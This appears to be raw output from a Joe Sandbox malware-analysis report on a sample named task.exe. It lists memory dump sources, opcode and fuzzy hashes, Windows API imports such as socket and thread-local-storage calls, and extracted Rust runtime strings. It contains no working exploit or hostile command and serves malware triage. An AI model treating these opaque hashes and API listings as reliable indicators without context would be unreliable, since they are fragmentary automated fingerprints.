                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                • Opcode ID: 8ac584019f3be98e7fa57f8b13d3eac3f3e20a9660b7cc1ee460636c1a4ade97
                                                                                                                                                                • Instruction ID: f4634984357183e73c77445d79f6b6493b82ec47cdcbb136b20ceaaf26da0b52
                                                                                                                                                                • Opcode Fuzzy Hash: 8ac584019f3be98e7fa57f8b13d3eac3f3e20a9660b7cc1ee460636c1a4ade97
                                                                                                                                                                • Instruction Fuzzy Hash: E921D370B007049FE7208F54D804BC67BF4AF5A709F10485DEA98ABB81E3B4F5448BD1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9e9605cc20d5a432bb4b98ed333ad3e91973b5d32c767189beb935d7d5ee4da1
                                                                                                                                                                • Instruction ID: 4be430ae873373efe0fff15a2b6c46cb7c1a2a89f1fa3e31600bdcf4338cd7ec
                                                                                                                                                                • Opcode Fuzzy Hash: 9e9605cc20d5a432bb4b98ed333ad3e91973b5d32c767189beb935d7d5ee4da1
                                                                                                                                                                • Instruction Fuzzy Hash: 46427971608301AFDB64DF28CC44B6BBBE9EF88714F18492DF9959B241EB70E941CB91
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 998833bc0e77813f16b864cde4f2b691253322b52f9f727ef907403d7a5a1060
                                                                                                                                                                • Instruction ID: d06b559936287624344ca6692bfb7d1ddf5178a5e36d267d12c3c24207d1b188
                                                                                                                                                                • Opcode Fuzzy Hash: 998833bc0e77813f16b864cde4f2b691253322b52f9f727ef907403d7a5a1060
                                                                                                                                                                • Instruction Fuzzy Hash: 90223EB1E0521A8FCB14CF5DC5905AEFBF2FF8E314F298A6AD415AB750D331A9418B90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: dea14903867f46ae59f47aa593ed50eb4510e5639d67bd95a1c20e868480f929
                                                                                                                                                                • Instruction ID: 15f9bcf9b3dd475ce1b8f78f114381c7cb6a424308d324e5a93aaf5954062556
                                                                                                                                                                • Opcode Fuzzy Hash: dea14903867f46ae59f47aa593ed50eb4510e5639d67bd95a1c20e868480f929
                                                                                                                                                                • Instruction Fuzzy Hash: 5102E571E0431A8FC711CE79C5802AFBAB2AFDB354F158B2AE815B7B41D771A9418B90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 62bb1aa7df9dc6a7a0fefcaf6cec0dd6a71d8d4cd5bcddaf6e7c1a3e5ec520d7
                                                                                                                                                                • Instruction ID: 5c891d491ca8868272e9e915b52e9b5ae2e10c0943097897c525e3b4f2b8d777
                                                                                                                                                                • Opcode Fuzzy Hash: 62bb1aa7df9dc6a7a0fefcaf6cec0dd6a71d8d4cd5bcddaf6e7c1a3e5ec520d7
                                                                                                                                                                • Instruction Fuzzy Hash: 87E13272E0022A8BDB24CF98DD84BEDB7B2BB8E314F154639D855B7781D7389D018B94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8D46C0: SetLastError.KERNEL32(00000000), ref: 6C8D4783
                                                                                                                                                                  • Part of subcall function 6C8D46C0: GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6C8D478B
                                                                                                                                                                  • Part of subcall function 6C8D46C0: GetLastError.KERNEL32 ref: 6C8D4797
                                                                                                                                                                  • Part of subcall function 6C8D46C0: GetLastError.KERNEL32 ref: 6C8D47A9
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 6C8D90DE
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C8D90E7
                                                                                                                                                                • RtlCaptureContext.KERNEL32(?), ref: 6C8D9107
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6C8D9149
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6C8D9173
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8D9188
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalkEx), ref: 6C8D91AB
                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 6C8D92D1
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalk64), ref: 6C8D9404
                                                                                                                                                                Strings
                                                                                                                                                                • SymGetModuleBase64, xrefs: 6C8D9168
                                                                                                                                                                • stack backtrace:, xrefs: 6C8D9063
                                                                                                                                                                • StackWalk64, xrefs: 6C8D93F9
                                                                                                                                                                • StackWalkEx, xrefs: 6C8D91A0
                                                                                                                                                                • SymFunctionTableAccess64, xrefs: 6C8D913E
                                                                                                                                                                • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6C8D92F8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCurrentProc$ErrorLast$Process$CaptureContextDirectoryMutexReleaseThread
                                                                                                                                                                • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
                                                                                                                                                                • API String ID: 1741357895-2373373428
                                                                                                                                                                APIs
                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 0040102E
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004010E5
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004010ED
                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0040110F
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401124
                                                                                                                                                                • GetModuleHandleA.KERNEL32(g2m.dll), ref: 004012B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004012DD
                                                                                                                                                                • MessageBoxA.USER32(00000000,004020D0,004020F8,00001010), ref: 00401365
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040136E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571404292.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1571376406.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1571419937.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1571437244.0000000000405000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Module$ExitHandleProcess$AddressCommandFileInfoLineMessageNameProcStartup
                                                                                                                                                                • String ID: @$L @$g2m.dll$ @
                                                                                                                                                                • API String ID: 195749359-3595644552
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                APIs
                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6C8F45B5
                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6C8F46C3
                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6C8F4815
                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6C8F4830
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                APIs
                                                                                                                                                                • InitOnceBeginInitialize.KERNEL32(?,00000000,00000000,00000000,?,?,6C8E0194), ref: 6C904DAA
                                                                                                                                                                • TlsAlloc.KERNEL32(?,6C8E0194), ref: 6C904DC2
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000000,00000000,?,6C8E0194), ref: 6C904DF2
                                                                                                                                                                • TlsAlloc.KERNEL32(?,?,6C8E0194,6C9331B8,6C8E0A00,FFFFFFFF,?,6C8DAF6E), ref: 6C904DFC
                                                                                                                                                                • TlsFree.KERNEL32(6C8E0A00,?,6C8E0194,6C9331B8,6C8E0A00,FFFFFFFF,?,6C8DAF6E), ref: 6C904E27
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000004,00000000,00000000,6C90E640), ref: 6C904E5A
                                                                                                                                                                Strings
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C904E75, 6C904EA5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(FFFFFFF5,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D6885,6C904A78), ref: 6C8DCE67
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D6885,6C904A78), ref: 6C8DCE76
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,?), ref: 6C8DCEBA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,6C90CC54,6C90E46C,?,?,6C90E45C), ref: 6C8DD15A
                                                                                                                                                                Strings
                                                                                                                                                                • called `Result::unwrap()` on an `Err` value, xrefs: 6C8DD10F
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8DD0C0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseConsoleErrorLastMode
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$called `Result::unwrap()` on an `Err` value
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6C8F3D87
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6C8F3D8F
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6C8F3E18
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6C8F3E43
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6C8F3E98
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,6C8F89DF,00000000,6C8F80F4,00000000,00000000,00000001,?,6C8F8B58,00000022,FlsSetValue,6C912308,6C912310,00000000), ref: 6C8F8991
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                APIs
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6C8DCA4D
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6C8DCA65
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000001), ref: 6C8DCA83
                                                                                                                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 6C8DCA95
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6C8DCAAC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DCABD
                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 6C8DCACD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,6C8F3F31,6C8F0F0A,6C8F08EE,?,6C8F0B26,?,00000001,?,?,00000001,?,6C91B280,0000000C,6C8F0C1F), ref: 6C8F416D
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C8F417B
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C8F4194
                                                                                                                                                                • SetLastError.KERNEL32(00000000,6C8F0B26,?,00000001,?,?,00000001,?,6C91B280,0000000C,6C8F0C1F,?,00000001,?), ref: 6C8F41E6
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6C8D78E3, 6C8D7900
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in>(), xrefs: 6C8D791D, 6C8D795A
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: freeaddrinfo
                                                                                                                                                                • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe, xrefs: 6C8FB69D
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,425D10BB,00000000,?,00000000,6C905C90,000000FF,?,6C8F798D,?,?,6C8F7961,?), ref: 6C8F7A28
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C8F7A3A
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6C905C90,000000FF,?,6C8F798D,?,?,6C8F7961,?), ref: 6C8F7A5C
                                                                                                                                                                Strings
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8D49C3
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6C8D49CE
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D49DA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D49EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2691138088-0
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8D4783
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6C8D478B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D4797
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D47A9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D4843
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3993060814-0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • __rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6C8D996D
                                                                                                                                                                • s<unknown>, xrefs: 6C8D97B0
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8D97B5
                                                                                                                                                                Memory Dump Source
